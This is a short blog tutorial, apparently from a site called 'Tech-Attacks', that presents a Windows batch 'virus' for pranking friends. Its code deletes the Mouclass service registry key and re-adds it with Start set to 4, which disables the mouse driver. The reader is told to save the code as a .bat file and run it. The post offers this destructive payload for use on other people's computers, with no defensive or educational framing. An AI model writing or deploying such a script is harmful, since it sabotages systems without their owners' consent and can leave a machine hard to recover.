Powered by Tech-Attacks

Make a Virus that Disable Mouse ( Tutorial )

 
I had previously posted on making different Batch Files which were interesting and completely harmless.
Today we will be making a batch virus which is harmfull or mostly used for joking or playing prank with friends, it will Disable your Mouse so think before trying it on yourself.
You dont need any kind of software or tool for this, just open Notepad and paste the below code.
CODE :
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
now, Save this file as  GJsHidMous.bat
And you are Done, you just created your virus.

No comments:

Post a Comment